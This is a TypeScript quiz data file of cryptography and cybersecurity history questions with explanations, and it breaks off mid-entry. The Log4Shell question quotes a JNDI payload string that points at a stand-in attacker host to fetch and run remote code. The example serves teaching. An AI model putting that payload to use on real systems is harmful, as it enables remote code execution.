import type { Question } from '../types';

export const vaultQuestions: Question[] = [
  // ── Original 6 questions ──────────────────────────────────
  {
    id: 4450001, topic: 'cybersecurity', difficulty: 'hard',
    question: 'Clifford Cocks at GCHQ independently invented RSA in 1973, four years before the public discovery. His key insight was:',
    options: [
      'Using the computational hardness of factoring the product of two large primes as a trapdoor function for public-key encryption',
      'Using elliptic curves over finite fields for key exchange',
      'Implementing a hash-based signature scheme resistant to quantum attacks',
      'Designing a symmetric cipher based on substitution-permutation networks',
    ],
    correctIndex: 0,
    explanation: 'Cocks recognized that $n = pq$ (product of two large primes) could serve as a trapdoor: encryption with the public key is easy, but decryption requires knowing $p$ and $q$. This is mathematically identical to RSA as published by Rivest, Shamir, and Adleman in 1978.',
    realWorld: 'GCHQ\'s discovery was classified for 24 years. James Ellis, who conceived the idea of "non-secret encryption," died 23 days before GCHQ acknowledged his priority.',
    hint: 'The trapdoor function relies on multiplication being easy but factoring being hard.',
  },
  {
    id: 4450002, topic: 'cybersecurity', difficulty: 'hard',
    question: 'IBM discovered differential cryptanalysis in 1974 and designed DES S-boxes to resist it. Differential cryptanalysis works by:',
    options: [
      'Analyzing how specific differences in plaintext pairs propagate through the cipher to produce predictable differences in ciphertext pairs',
      'Brute-forcing all possible keys until the correct decryption is found',
      'Exploiting timing side-channels in the cipher\'s hardware implementation',
      'Using linear approximations of the cipher\'s Boolean functions',
    ],
    correctIndex: 0,
    explanation: 'Differential cryptanalysis traces input difference pairs $\\Delta X$ through each round, exploiting non-uniform output difference distributions in S-boxes. IBM\'s S-boxes were designed so that all differential characteristics had uniformly low probability.',
    realWorld: 'The technique was independently rediscovered by Biham and Shamir in 1990 — 16 years later. IBM\'s silence is the most consequential suppression of a mathematical technique in civilian cryptography.',
    hint: 'It studies how XOR differences between plaintext pairs affect ciphertext differences.',
  },
  {
    id: 450003, topic: 'cybersecurity', difficulty: 'sota',
    question: 'The NSA\'s Dual_EC_DRBG backdoor relied on the relationship between two elliptic curve points $P$ and $Q$. If the NSA knew the discrete logarithm $e$ such that $Q = eP$, they could:',
    options: [
      'Predict all future outputs of the pseudorandom number generator from a single 32-byte output sample, enabling decryption of any TLS session using it',
      'Only decrypt messages if they also had the server\'s TLS certificate private key',
      'Recover the seed but not predict future outputs due to forward secrecy',
      'Only attack implementations using P-256 curves, not P-384',
    ],
    correctIndex: 0,
    explanation: 'With $Q = eP$, observing output $r = x(kP)$ lets the attacker compute $e^{-1} \\cdot rP = kQ$, recovering the internal state. From there, all future outputs are deterministic. This is a complete break of the PRNG.',
    realWorld: 'RSA Security made Dual_EC the default in BSAFE, reportedly after receiving $10M from the NSA. Snowden\'s documents confirmed the BULLRUN program to subvert cryptographic standards.',
    hint: 'Knowing the discrete log between P and Q lets you reverse-engineer the internal state from any output.',
  },
  {
    id: 450004, topic: 'cryptography', difficulty: 'hard',
    question: 'The VENONA project broke Soviet one-time pad messages — which are theoretically unbreakable (Shannon 1949). This was possible because:',
    options: [
      'Soviet manufacturing errors caused some one-time pad key pages to be duplicated, creating "depth" that enabled cryptanalysis via known-plaintext techniques',
      'The US had stolen copies of the Soviet codebooks through espionage',
      'Quantum computing prototypes at Bell Labs could factor the key material',
      'The Soviets used a weak pseudo-random generator instead of truly random keys',
    ],
    correctIndex: 0,
    explanation: 'A one-time pad is unbreakable if and only if each key page is used exactly once. When two messages share the same key (called "depth"), XORing the ciphertexts yields the XOR of the plaintexts, which can be solved using linguistic analysis.',
    realWorld: 'VENONA ran from 1943 to 1980 and was declassified in 1995 — a 52-year secret that identified the Rosenbergs, Klaus Fuchs, and dozens of Soviet spies in the Manhattan Project.',
    hint: 'The one-time pad is perfect — but only if you never reuse the pad.',
  },
  {
    id: 450005, topic: 'cybersecurity', difficulty: 'hard',
    question: 'Skipjack, the NSA\'s classified block cipher used in the Clipper chip, violated a fundamental cryptographic principle known as:',
    options: [
      'Kirchhoffs\'s principle — a cryptosystem should be secure even if everything about the system, except the key, is public knowledge',
      'Shannon\'s maxim — the enemy knows the system, but confusion and diffusion ensure security',
      'The Dolev-Yao threat model — the attacker controls the network but cannot break the cipher',
      'The random oracle model — hash functions behave as ideal random functions',
    ],
    correctIndex: 0,
    explanation: 'Kirchhoffs\'s principle (1883) states that security must reside in the key alone, not in the secrecy of the algorithm. Skipjack\'s security relied on its classification — when declassified in 1998, Biham and Shamir attacked 31 of 32 rounds within months.',
    realWorld: 'The Clipper chip\'s failure established the modern norm that all public cryptographic standards (AES, SHA-3, post-quantum) must undergo open review.',
    hint: 'A cipher should be secure even if the enemy knows exactly how it works — only the key should be secret.',
  },
  {
    id: 450006, topic: 'cryptography', difficulty: 'sota',
    question: 'The Enigma machine\'s critical mathematical weakness that Turing exploited was:',
    options: [
      'The reciprocal property — Enigma never encrypted a letter as itself, providing a constraint that eliminated vast portions of the key space',
      'The rotor wiring was identical across all machines, allowing pre-computation',
      'The plugboard connections were predictable based on the date',
      'Messages always began with "Heil Hitler," providing known plaintext',
    ],
    correctIndex: 0,
    explanation: 'The reciprocal substitution (if A→K then K→A) combined with the no-self-encryption property meant that for any crib (suspected plaintext), contradictions could rapidly eliminate incorrect rotor settings. Turing\'s Bombe exploited these constraints to test ~17,576 settings in minutes.',
    realWorld: 'Ultra intelligence shortened WWII by an estimated 2 years and saved ~14 million lives. The 10,000 people who worked at Bletchley Park kept the secret for 29 years.',
    hint: 'A letter can never encrypt to itself — this seemingly minor constraint is catastrophic for the cipher\'s security.',
  },
  // ── 8 NEW questions for new vault entries ──────────────────
  {
    id: 450007, topic: 'cryptography', difficulty: 'sota',
    question: 'Bill Tutte reverse-engineered the Lorenz SZ40/42 cipher machine at Bletchley Park without ever seeing the physical device. His method relied on:',
    options: [
      'Statistical analysis of the depth (overlapping key streams) in two messages encrypted with the same wheel settings, revealing the logical structure of all 12 rotors',
      'Capturing a physical Lorenz machine from a German submarine',
      'Using Enigma decrypts to infer the Lorenz key structure',
      'Brute-force testing all possible rotor configurations on Colossus',
    ],
    correctIndex: 0,
    explanation: 'When two messages were accidentally sent with identical wheel positions, Tutte obtained the XOR of two plaintexts. By analyzing the statistical properties of this "depth," he deduced the number of pins on each of the 12 wheels and their interaction patterns — reconstructing the entire machine\'s logic from pure mathematics.',
    realWorld: 'Tommy Flowers built Colossus — the world\'s first programmable electronic computer — to operationalize Tutte\'s cryptanalysis. Its existence was classified until 2000, meaning ENIAC was wrongly credited as the first for 55 years.',
    hint: 'Two messages encrypted with the same settings create a "depth" — the XOR of the plaintexts leaks structural information about the cipher.',
  },
  {
    id: 450008, topic: 'cryptography', difficulty: 'hard',
    question: 'William Friedman\'s team cracked Japan\'s Purple cipher machine in 1940 by deducing that its encryption mechanism used:',
    options: [
      'Telephone stepping switches (6×25 uniselectors) rather than rotors, creating a polyalphabetic substitution with a period determined by the switch stepping sequence',
      'Enigma-style rotors modified with Japanese Katakana character sets',
      'A one-time pad system distributed via diplomatic pouch',
      'A book cipher based on standardized Japanese diplomatic codebooks',
    ],
    correctIndex: 0,
    explanation: 'Genevieve Grotjan identified repeating patterns in the ciphertext at intervals of 25 — the number of positions on a telephone stepping switch. This insight revealed that Purple split the alphabet into a group of 6 and a group of 20, each enciphered by separate stepping switch banks.',
    realWorld: 'The MAGIC intelligence from Purple decrypts gave US leaders advance knowledge of Japanese diplomatic positions, but the Pearl Harbor attack succeeded because tactical military ciphers used different systems.',
    hint: 'The repeating period of 25 in the ciphertext pointed to an electromechanical component with exactly 25 positions.',
  },
  {
    id: 450009, topic: 'cryptography', difficulty: 'hard',
    question: 'The Navajo Code Talkers\' code was never broken because it employed a dual-layer encoding system. The first layer was:',
    options: [
      'Substituting military terms with unrelated Navajo words (e.g., "turtle" for "tank"), while the second layer used multiple Navajo words per English letter to prevent frequency analysis',
      'A simple word-for-word translation from English to Navajo',
      'A mathematically generated cipher using Navajo phonemes as the key alphabet',
      'Standard military codes translated into Navajo syntax',
    ],
    correctIndex: 0,
    explanation: 'The code used ~450 military terms mapped to Navajo words chosen for metaphorical associations (fighter plane = "hummingbird"). For words not in the vocabulary, a Navajo alphabet was used where each English letter could be represented by multiple Navajo words (e.g., "A" could be "ant," "apple," or "axe" in Navajo), defeating frequency analysis.',
    realWorld: 'The Code Talkers could encode, transmit, and decode a three-line message in 20 seconds — a task that took cipher machines 30 minutes. Speed and unbreakability in one system.',
    hint: 'Having multiple possible encodings for each letter prevents the statistical patterns that frequency analysis exploits.',
  },
  {
    id: 450010, topic: 'cryptography', difficulty: 'hard',
    question: 'The Zimmermann Telegram, decrypted by Room 40 in 1917, proposed that Germany would help Mexico reconquer which US territories?',
    options: [
      'Texas, New Mexico, and Arizona — territories lost in the Mexican-American War of 1846-1848',
      'California, Nevada, and Oregon — the entire Pacific coast',
      'Florida and Louisiana — territories with historical Spanish claims',
      'All US states south of the Mason-Dixon line',
    ],
    correctIndex: 0,
    explanation: 'Zimmermann proposed that if the US entered WWI against Germany, Mexico should attack the United States with German financial support, recovering Texas, New Mexico, and Arizona (lost in the Treaty of Guadalupe Hidalgo, 1848). The British had to devise a cover story to hide the fact they were reading German diplomatic traffic via transatlantic cable taps.',
    realWorld: 'When the telegram was published, Arthur Zimmermann himself confirmed its authenticity — a catastrophic diplomatic blunder. The US declared war on Germany five weeks later, decisively tipping the balance of WWI.',
    hint: 'The territories named were those Mexico had ceded to the US after the Mexican-American War.',
  },
  {
    id: 450011, topic: 'cybersecurity', difficulty: 'sota',
    question: 'Stuxnet targeted Iran\'s nuclear centrifuges at Natanz by manipulating Siemens S7-315/417 PLCs. The worm\'s most sophisticated feature was:',
    options: [
      'A man-in-the-middle attack on physical reality — it replayed normal telemetry to operators while secretly altering centrifuge rotor speeds to cause mechanical failure',
      'Encrypting all centrifuge data with ransomware until Iran paid a cryptocurrency ransom',
      'Disabling the facility\'s cooling systems to cause a nuclear meltdown',
      'Sending false intelligence reports to IAEA inspectors',
    ],
    correctIndex: 0,
    explanation: 'Stuxnet intercepted the communication between the SCADA system and the PLCs, recording normal operating data during a reconnaissance phase. During attack cycles, it altered rotor speeds between 1,410 Hz and 2 Hz (normal: 1,064 Hz) while replaying the recorded normal telemetry — operators saw everything as normal while centrifuges tore themselves apart.',
    realWorld: 'An estimated 984 centrifuges were destroyed. The worm used four zero-day exploits simultaneously — unprecedented sophistication that immediately pointed to a nation-state actor.',
    hint: 'The attack was invisible to operators because the worm showed them what they expected to see, not what was actually happening.',
  },
  {
    id: 450012, topic: 'cybersecurity', difficulty: 'hard',
    question: 'The Heartbleed vulnerability (CVE-2014-0160) in OpenSSL allowed attackers to read server memory because:',
    options: [
      'The TLS Heartbeat implementation failed to validate the payload length field, allowing an attacker to request up to 64KB of adjacent memory with each heartbeat request',
      'The SSL private key was stored in plaintext in a world-readable configuration file',
      'A buffer overflow in the TLS handshake allowed arbitrary code execution',
      'The random number generator used for session keys had insufficient entropy',
    ],
    correctIndex: 0,
    explanation: 'RFC 6520 defines TLS Heartbeat: a client sends a payload with a length field, and the server echoes it back. OpenSSL\'s implementation used `memcpy` with the client-supplied length without checking if the actual payload was that long. An attacker could claim a 64KB payload while sending only 1 byte, causing the server to return 64KB of whatever happened to be in memory — private keys, passwords, session tokens.',
    realWorld: 'The fix was a single bounds check: `if (1 + 2 + payload + 16 > s->s3->rrec.length) return 0;` — perhaps the most consequential one-line patch in software history.',
    hint: 'The server trusted the client\'s claimed payload length without verifying it against the actual data received.',
  },
  {
    id: 50013, topic: 'cryptography', difficulty: 'sota',
    question: 'Google\'s SHAttered attack produced the first practical SHA-1 collision. The computational cost was approximately:',
    options: [
      '$2^{63.1}$ SHA-1 computations — 100,000× faster than brute force ($2^{80}$) but still requiring 6,500 CPU-years, demonstrating the gap between theoretical and practical breaks',
      '$2^{80}$ computations — identical to brute force, proving theoretical attacks provided no speedup',
      '$2^{40}$ computations — trivially achievable on a single laptop in hours',
      '$2^{128}$ computations — requiring more than SHA-256\'s theoretical collision resistance',
    ],
    correctIndex: 0,
    explanation: 'Wang\'s 2005 theoretical attack reduced SHA-1 collision resistance from $2^{80}$ to approximately $2^{69}$. Stevens et al. refined this to $2^{63.1}$ operations using differential path analysis. Google provided the equivalent of 6,500 CPU-years (110 GPU-years) of cloud compute to execute it — proving the attack was practical for well-resourced adversaries.',
    realWorld: 'Within hours of SHAttered\'s publication, WebKit\'s SVN repository was disrupted by a proof-of-concept using the collision PDFs. Linus Torvalds accelerated Git\'s transition from SHA-1 to SHA-256.',
    hint: 'The attack was vastly faster than brute force but still required massive computational resources — only feasible for nation-states or tech giants.',
  },
  {
    id: 50014, topic: 'cybersecurity', difficulty: 'sota',
    question: 'The NSA\'s XKeyscore system, revealed by Snowden in 2013, was distinguished from other surveillance programs because:',
    options: [
      'It allowed analysts to search the full content of emails, chats, and browsing history in real-time with no prior court authorization — just a self-certified justification form',
      'It only collected metadata (sender, recipient, timestamps) and never accessed message content',
      'It required a FISA court warrant for each individual search query',
      'It only monitored communications entering or leaving the United States, not domestic traffic',
    ],
    correctIndex: 0,
    explanation: 'XKeyscore\'s training materials stated analysts could search "nearly everything a typical user does on the internet" using a simple web form. Unlike PRISM (which collected from company servers under legal compulsion), XKeyscore operated on raw internet traffic at collection points worldwide, with analyst self-certification as the only access control.',
    realWorld: 'NSA training slides showed XKeyscore could find "all the encrypted word documents" from a target country, search by language, or find anyone who searched for specific terms — capabilities that stunned even seasoned intelligence professionals.',
    hint: 'The key distinction was the absence of external oversight — analysts were their own gatekeepers.',
  },
  // ── 8 NEW questions for epic & funny entries ──────────────
  {
    id: 50015, topic: 'cryptography', difficulty: 'hard',
    question: 'The CIA\'s Kryptos sculpture has four encrypted sections. K1-K3 were solved, but K4 remains unbroken after 34 years. The K1 and K2 sections used which cipher technique?',
    options: [
      'Vigenère cipher with keyword substitution, followed by transposition — classical techniques that yielded to persistent cryptanalysis',
      'AES-256 encryption with a key embedded in the sculpture\'s physical dimensions',
      'RSA public-key encryption with the private key held by the CIA director',
      'Quantum-resistant lattice-based encryption designed by NSA mathematicians',
    ],
    correctIndex: 0,
    explanation: 'K1 used a modified Vigenère cipher (keyword: PALIMPSEST), K2 used Vigenère with the keyword ABSCISSA plus transposition. K3 used a keyed columnar transposition. K4\'s method remains unknown — it may use an entirely novel cipher or require the K1-K3 solutions as additional key material.',
    realWorld: 'Sanborn has given the CIA director the solution in a sealed envelope. When asked if the NSA has solved it, he said: "I assume they have. They won\'t tell me."',
    hint: 'The first sections used classical cipher techniques dating back centuries — but the final section may be something entirely different.',
  },
  {
    id: 50016, topic: 'cybersecurity', difficulty: 'hard',
    question: 'The NSA\'s TEMPEST program discovered that electronic devices leak information through electromagnetic emissions. The most dramatic demonstrated attack was:',
    options: [
      'Reconstructing the complete image displayed on a CRT monitor from its electromagnetic radiation intercepted from another room — or even another building',
      'Reading keystrokes only when the keyboard was physically connected via USB',
      'Intercepting WiFi signals to determine which websites were being visited',
      'Using Bluetooth vulnerabilities to pair with nearby devices',
    ],
    correctIndex: 0,
    explanation: 'Wim van Eck demonstrated in 1985 that CRT monitors emit radiation at frequencies that mirror the electron beam scanning the screen. Using a modified TV receiver and directional antenna, he could reconstruct readable screen images from hundreds of meters away — through walls. This is now called "Van Eck phreaking."',
    realWorld: 'Modern LCD monitors leak less than CRTs but are still vulnerable. Researchers have demonstrated eavesdropping on LCD screens via HDMI cable radiation, LED indicator patterns, and even the acoustic noise of capacitors.',
    hint: 'CRT monitors use an electron beam that sweeps the screen — and that beam creates radio waves that carry the same information.',
  },
  {
    id: 50017, topic: 'cybersecurity', difficulty: 'hard',
    question: 'The Soviet Union banned cybernetics from 1950-1961, calling it a "bourgeois pseudoscience." The primary reason was:',
    options: [
      'Ideological — Wiener\'s cybernetics treated biological and mechanical systems as equivalent, contradicting dialectical materialism\'s distinction between living and non-living matter',
      'Military — the Soviets feared cybernetics research would reveal their computer capabilities to the West',
      'Economic — cybernetics research was too expensive for the post-war Soviet economy',
      'Personal — Stalin held a grudge against Norbert Wiener over a rejected collaboration proposal',
    ],
    correctIndex: 0,
    explanation: 'Soviet ideology held that living organisms (governed by dialectical materialism) were fundamentally different from machines. Wiener\'s cybernetics treated both as information-processing systems governed by feedback loops — an equivalence that Soviet philosophers considered ideologically dangerous and "anti-Marxist."',
    realWorld: 'The irony is that cybernetics would have been perfect for Soviet central planning. Anatoly Kitov proposed using computers for economic planning in 1959 — and was expelled from the Communist Party for it.',
    hint: 'The objection was philosophical: equating living systems with machines challenged core Soviet ideology about the nature of matter.',
  },
  {
    id: 50018, topic: 'cybersecurity', difficulty: 'hard',
    question: 'The CIA\'s A-12 OXCART spy plane (tested at Area 51) flew at Mach 3.2. At that speed, the biggest engineering challenge was:',
    options: [
      'Thermal expansion — the titanium airframe heated to 300°C and grew several inches in flight, requiring expansion joints and fuel tank seals that only sealed when hot',
      'Maintaining radio communication at supersonic speeds due to ionization of surrounding air',
      'Keeping the pilot conscious at extreme G-forces during turns',
      'Preventing sonic booms from alerting ground observers to the aircraft\'s presence',
    ],
    correctIndex: 0,
    explanation: 'At Mach 3.2, air friction heated the A-12\'s titanium skin to over 300°C. The airframe expanded so much that fuel tanks leaked on the ground — they were designed to seal only when the metal expanded at operating temperature. Pilots described the aircraft as "sweating fuel" during taxi.',
    realWorld: 'The CIA had to secretly purchase titanium from the Soviet Union through shell companies — the primary source of the metal needed to build a plane designed to spy on the Soviet Union.',
    hint: 'When metal gets very hot, it expands. When your entire aircraft is the metal, this becomes an existential engineering problem.',
  },
  {
    id: 50019, topic: 'cybersecurity', difficulty: 'easy',
    question: 'The US nuclear launch system (SACDIN) used 8-inch floppy disks until 2019. The Pentagon argued this was actually a security advantage because:',
    options: [
      'The system was completely air-gapped, used no modern OS, and the hardware was so obsolete that no attacker could create compatible malware',
      'Floppy disks could store nuclear launch codes more securely than solid-state drives',
      'The magnetic storage was resistant to electromagnetic pulse (EMP) attacks',
      'It was cheaper to maintain than upgrading to modern hardware',
    ],
    correctIndex: 0,
    explanation: 'The IBM Series/1 ran a custom operating system with no network connectivity, no USB ports, no wireless interfaces, and used a storage format so obsolete that creating a weaponized floppy disk would require hardware that essentially doesn\'t exist anymore. It was, paradoxically, more secure than any modern system.',
    realWorld: 'The system was only upgraded in 2019 because finding replacement parts for 1970s IBM hardware became impossible — not because of any security concern.',
    hint: 'Sometimes the best cybersecurity is being so outdated that nobody remembers how your technology works.',
  },
  {
    id: 450020, topic: 'cryptography', difficulty: 'hard',
    question: 'In 2012, a dead WWII carrier pigeon was found in a chimney with an encrypted message. GCHQ attempted to decode it and concluded:',
    options: [
      'The message was likely encrypted with a one-time pad, making it theoretically unbreakable without the specific key page — which was destroyed after the war',
      'The message was a simple substitution cipher that GCHQ decoded within hours',
      'The pigeon was a hoax planted by a history enthusiast',
      'The message used the Enigma cipher and was decoded using Bletchley Park techniques',
    ],
    correctIndex: 0,
    explanation: 'GCHQ determined the message consisted of 27 five-letter code groups consistent with a one-time pad or codebook system used by the Special Operations Executive (SOE). Without the specific key page or codebook — both routinely destroyed after use — the message is mathematically unbreakable.',
    realWorld: 'A Canadian historian claimed to have decoded it using a WWI-era codebook, producing "Jerry artillery positions at..." GCHQ diplomatically called this "wishful thinking."',
    hint: 'If the key was used once and then destroyed, even the codebreakers who cracked Enigma can\'t help you.',
  },
  {
    id: 450021, topic: 'cryptography', difficulty: 'sota',
    question: 'Cicada 3301\'s recruitment puzzles (2012-2014) required solvers to demonstrate skills across multiple disciplines. The physical component involved:',
    options: [
      'QR codes posted on lampposts in 14 countries simultaneously — Sydney, Seoul, Warsaw, Miami, Paris, and others — requiring a globally distributed solving team',
      'A single physical location in Washington D.C. where solvers had to appear in person',
      'USB drives mailed to the first 100 people who solved the online portion',
      'A scavenger hunt limited to university campuses in the United States',
    ],
    correctIndex: 0,
    explanation: 'After solving steganographic, cryptographic, and number-theoretic online challenges, solvers were directed to physical locations where posters with QR codes had been placed. The simultaneous global deployment — 14 countries on multiple continents — demonstrated that the organizing entity had significant resources and worldwide operational capability.',
    realWorld: 'The fact that Cicada 3301 could coordinate physical placements across 14 countries while maintaining complete anonymity is itself one of the most impressive operational security achievements in internet history.',
    hint: 'The puzzle required solvers to physically visit locations around the world — proving the organizers had global reach.',
  },
  {
    id: 450022, topic: 'cybersecurity', difficulty: 'easy',
    question: 'During the Y2K midnight rollover on January 1, 2000, the US and Russia took the unprecedented step of:',
    options: [
      'Staffing a joint nuclear command center inside Cheyenne Mountain, Colorado — where Russian and American officers sat side by side monitoring both nations\' nuclear forces',
      'Temporarily disabling all nuclear weapons worldwide for 24 hours',
      'Launching all nuclear submarines to sea to prevent land-based computer failures from affecting them',
      'Transferring nuclear launch authority from computers to a manual chain of command',
    ],
    correctIndex: 0,
    explanation: 'The Center for Y2K Strategic Stability was established inside NORAD\'s Cheyenne Mountain complex. Russian Strategic Rocket Forces officers worked alongside US Space Command staff to monitor early warning systems and launch computers across every time zone\'s midnight rollover — ensuring no Y2K glitch was misinterpreted as an attack.',
    realWorld: 'The center was decommissioned on January 2, 2000. For one night, mutual assured destruction was replaced by mutual assured debugging.',
    hint: 'Cold War enemies literally sat in the same bunker to make sure a date bug didn\'t end civilization.',
  },
  // ── Questions for entries 23-24 (previously uncovered) ──────
  {
    id: 50023, topic: 'cryptography', difficulty: 'hard',
    question: 'Cicada 3301\'s online puzzles incorporated steganography — hiding data within images. The most common steganographic technique used was:',
    options: [
      'Encoding data in the least significant bits (LSB) of pixel color values, making changes invisible to the human eye while embedding arbitrary binary data',
      'Hiding text in the EXIF metadata fields of JPEG images',
      'Using invisible Unicode characters between visible text characters',
      'Embedding Morse code in the image\'s compression artifacts',
    ],
    correctIndex: 0,
    explanation: 'LSB steganography modifies the lowest-order bit of each color channel (R, G, B) per pixel. Since changing the least significant bit alters the color value by at most 1/256, the difference is imperceptible. A 1920×1080 image can hide ~780KB of data this way.',
    realWorld: 'Cicada 3301 used OutGuess steganography on their initial 4chan image. Tools like steghide and OutGuess are standard for CTF competitions worldwide.',
    hint: 'The lowest bit of each pixel\'s color channels can be changed without any visible difference to the human eye.',
  },
  {
    id: 50024, topic: 'cybersecurity', difficulty: 'easy',
    question: 'The Y2K bug was caused by a seemingly trivial programming shortcut. The root cause was:',
    options: [
      'Storing years as two digits (e.g., "99" for 1999) to save memory, meaning the year 2000 would be interpreted as 1900',
      'Using hexadecimal date encoding that overflowed at the millennium boundary',
      'An off-by-one error in the Unix epoch timestamp calculation',
      'Daylight saving time conflicts between US and European time zones',
    ],
    correctIndex: 0,
    explanation: 'In the 1960s-70s, memory was expensive ($1/byte), so programmers saved 2 bytes per date by storing only the last two digits of the year. When "99" rolled to "00," systems would interpret it as 1900, potentially causing date comparisons, interest calculations, and sorting to fail catastrophically.',
    realWorld: 'The global Y2K remediation effort cost an estimated $300-600 billion. The fact that relatively little went wrong on January 1, 2000 is evidence the money was well spent — not that the threat was overhyped.',
    hint: 'When memory costs $1 per byte, saving 2 bytes per date field across millions of records adds up — until the calendar catches up.',
  },
  // ── Questions for 8 new entries (25-32) ──────────────────────
  {
    id: 50025, topic: 'cryptography', difficulty: 'hard',
    question: 'Herbert Yardley\'s "American Black Chamber" gave US negotiators a decisive advantage at the 1921 Washington Naval Conference by:',
    options: [
      'Reading Japan\'s internal cables revealing their minimum acceptable battleship ratio, allowing the US to push Japan to accept worse terms than they otherwise would have',
      'Forging fake Japanese diplomatic messages to mislead British negotiators',
      'Intercepting British naval deployment orders and sharing them with Japan',
      'Planting false intelligence about US naval capabilities in intercepted cables',
    ],
    correctIndex: 0,
    explanation: 'Japan\'s instructions to their delegation revealed they would accept a 10:10:6 ratio (US:UK:Japan) despite publicly demanding 10:10:7. Knowing Japan\'s true bottom line, US negotiators pushed for and achieved the lower ratio — a textbook case of signals intelligence providing negotiating leverage.',
    realWorld: 'When Yardley published these secrets in his 1931 book for money, Japan immediately overhauled all their codes — leading to the much harder Purple cipher that the US then spent years breaking.',
    hint: 'Knowing your opponent\'s walk-away point in a negotiation is the ultimate advantage.',
  },
  {
    id: 50026, topic: 'cryptography', difficulty: 'hard',
    question: 'In the Babington Plot (1586), spymaster Walsingham\'s cryptanalyst Thomas Phelippes didn\'t just decrypt Mary Queen of Scots\' letters — he also:',
    options: [
      'Forged a postscript to Mary\'s letter asking the conspirators to name themselves, turning cryptanalysis into an active entrapment operation',
      'Replaced the encrypted messages with disinformation to mislead the plotters',
      'Published the decrypted letters in London newspapers to turn public opinion',
      'Sent the decrypted intelligence directly to Mary to intimidate her into confessing',
    ],
    correctIndex: 0,
    explanation: 'After decrypting Mary\'s approval of the assassination plot, Phelippes added a forged postscript in Mary\'s cipher asking Babington to identify his co-conspirators. Babington complied, providing a complete list. This is the first documented case of offensive cryptanalysis — actively manipulating encrypted communications rather than passively reading them.',
    realWorld: 'The decrypted and forged letters were presented at Mary\'s trial. She was beheaded on February 8, 1587. Cryptanalysis had its first kill.',
    hint: 'Why just read the enemy\'s mail when you can add to it?',
  },
  {
    id: 50027, topic: 'cryptography', difficulty: 'hard',
    question: 'The Rossignol family\'s Grand Chiffre of Louis XIV resisted cryptanalysis for 200 years because it substituted numbers for:',
    options: [
      'Syllables rather than individual letters, making frequency analysis of single-character frequencies ineffective',
      'Individual letters using a simple one-to-one mapping',
      'Entire words with a fixed codebook of 100 entries',
      'Musical notes that were then transcribed as numbers',
    ],
    correctIndex: 0,
    explanation: 'By encoding syllables instead of letters, the Grand Chiffre had ~587 cipher symbols for a much larger symbol set. Frequency analysis — which works by exploiting the uneven distribution of individual letters (E=13%, T=9%, etc.) — fails because syllable frequencies are more evenly distributed and the mapping was homophonic (multiple numbers per syllable).',
    realWorld: 'When Bazeries finally cracked it in 1893, he discovered the Man in the Iron Mask was not a royal twin but a disgraced general — dissolving 200 years of romantic speculation.',
    hint: 'Frequency analysis targets individual letter frequencies — but what if the cipher doesn\'t encode individual letters?',
  },
  {
    id: 50028, topic: 'cryptography', difficulty: 'sota',
    question: 'Statistical analysis of the Voynich Manuscript shows its text follows Zipf\'s law (word frequency distribution). This is significant because:',
    options: [
      'Zipf\'s law is characteristic of natural language — random or meaningless text does not follow it, suggesting the manuscript encodes real linguistic content rather than being gibberish',
      'Zipf\'s law proves the text is written in Latin with simple substitution',
      'Only computer-generated text follows Zipf\'s law, proving the manuscript is a modern forgery',
      'Zipf\'s law indicates the text is mathematical notation, not language',
    ],
    correctIndex: 0,
    explanation: 'Zipf\'s law states that in natural language, the frequency of a word is inversely proportional to its rank. The Voynich text follows this distribution with the same exponent (~1.0) as known natural languages. Additionally, its entropy (information density per character) matches natural language rather than random strings or simple ciphers.',
    realWorld: 'Despite matching natural language statistics, no proposed decipherment has been accepted by the academic community. The manuscript may use a constructed language or a cipher so novel it remains unrecognized.',
    hint: 'If random text doesn\'t follow Zipf\'s law but the Voynich text does, what does that tell us about whether the text is meaningful?',
  },
  {
    id: 50029, topic: 'cybersecurity', difficulty: 'sota',
    question: 'The SolarWinds SUNBURST attack was exceptionally difficult to detect because the backdoor:',
    options: [
      'Was inserted into the build pipeline so the malicious code was compiled into digitally signed updates, appearing as legitimate vendor software that passed all integrity checks',
      'Used quantum encryption to hide its communication with command servers',
      'Only activated when the infected system was connected to Russian IP addresses',
      'Was disguised as a Windows operating system update rather than a SolarWinds update',
    ],
    correctIndex: 0,
    explanation: 'By compromising the build system rather than the source code repository, the attackers ensured the backdoor was compiled and digitally signed by SolarWinds\' own code-signing certificate. Security tools that verified software signatures would approve the infected update. The backdoor also used domain names mimicking legitimate SolarWinds traffic patterns.',
    realWorld: 'The attack went undetected for 9+ months. It was only discovered when FireEye noticed their own red team tools being stolen — the attackers got greedy.',
    hint: 'The most trusted software is the software your vendor digitally signs and delivers through official channels.',
  },
  {
    id: 450030, topic: 'cybersecurity', difficulty: 'sota',
    question: 'NSO Group\'s Pegasus spyware achieved "zero-click" exploitation — compromising phones without any user interaction. The primary technique was:',
    options: [
      'Exploiting memory corruption vulnerabilities in media parsers (like iMessage\'s image rendering), sending an invisible message that triggered code execution during automatic parsing',
      'Calling the target\'s phone and exploiting a vulnerability in the cellular baseband processor',
      'Sending a malicious app update through the official App Store',
      'Using social engineering to trick targets into visiting a website',
    ],
    correctIndex: 0,
    explanation: 'Zero-click exploits target code that processes data automatically — like image decoders, PDF renderers, or message preview generators. iMessage would automatically parse received images, and a specially crafted image could trigger a buffer overflow in the ImageIO framework, achieving remote code execution before the user even saw a notification.',
    realWorld: 'Apple\'s BlastDoor sandbox (introduced in iOS 14) was specifically designed to mitigate iMessage zero-click attacks. NSO bypassed it. Apple\'s Lockdown Mode (iOS 16) further reduces the attack surface.',
    hint: 'The exploit targets code that runs automatically when data arrives — before the user makes any decision.',
  },
  {
    id: 450031, topic: 'cybersecurity', difficulty: 'hard',
    question: 'The Log4Shell vulnerability (CVE-2021-44228) was trivially exploitable because Log4j\'s JNDI lookup feature would:',
    options: [
      'Interpret special syntax like ${jndi:ldap://attacker.com/x} in any logged string as an instruction to fetch and execute remote Java classes from an attacker-controlled server',
      'Write all logged data to a publicly accessible file without access controls',
      'Send all log entries to a central Apache server that could be compromised',
      'Allow SQL injection through log message formatting strings',
    ],
    correctIndex: 0,
    explanation: 'Log4j supported JNDI (Java Naming and Directory Interface) lookups within log messages. When it encountered ${jndi:ldap://...}, it would connect to the specified LDAP server and load a Java class. Since anything can get logged — HTTP headers, form inputs, chat messages — any user-controllable string became a remote code execution vector.',
    realWorld: 'Minecraft players discovered they could crash servers by typing the exploit string in chat. The Minecraft community\'s rapid response helped sound the alarm before enterprise systems were massively compromised.',
    hint: 'A logging library that interprets user input as code is the textbook definition of an injection vulnerability.',
  },
  {
    id: 450032, topic: 'cybersecurity', difficulty: 'sota',
